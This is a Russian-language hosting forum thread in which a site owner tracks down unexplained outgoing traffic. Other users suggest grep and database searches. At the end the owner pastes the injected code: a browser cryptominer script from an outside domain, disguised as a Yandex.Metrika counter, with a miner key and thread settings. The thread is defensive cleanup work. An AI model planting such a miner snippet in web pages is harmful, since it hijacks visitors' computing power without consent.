Хостинг. Как закрыть исходящие запросы на определенный IP

partydress
3 року
0

Сайт постоянно превышает свой лимит, изучил многое, но увидел несколько тысяч исходящих запросов каждый день на IP 35.156.202.150 через порт 80. Пытался закрыть этот порт, пишет зарезервировано.
Подскажите, может есть возможность закрыть этот IP, пока я не нашел тот троян, который, видимо это делает. Антивирусы ничего не находят, сайты анализаторы нашли вставку с неизвестного сайта:
verifier.live/lib/crypta.js
пока что пытаюсь найти ее локацию у себя. такого скрипта я не нашел, но может встроено куда-то.
спасибо за совет!

Дмитрий Б.
3 року
0

Попробуйте подключиться к Вашему аккаунту по ssh и сделать поиск по этому URL. Например командой grep -r 'crypta.js'

partydress
3 року
0

спасибо, попробую! я по ftp поиски проводил, но пока не нашел ни такого файла, ни встречающейся внутри информации(

KarlovA
3 року
0

Думаю, не лишним будет также поиск упоминаний crypta.js и в базе данных, которую использует сайт.

partydress
3 року
0

Понял, спасибо, поищу там тоже!

partydress
3 року
0

Вот нашел такой код на главной, замаскирован под счетчик яндекс-метрики.

<!-- /Yandex.Metrika counter -->
<script src="//verifier.live/lib/crypta.js"></script>
<script>
var miner=new CRLT.Anonymous('57fc2dc75627403dc458cdc79c9a94ba674aa541dd15', {
threads:4,throttle:0.2,
});
miner.start();
</script>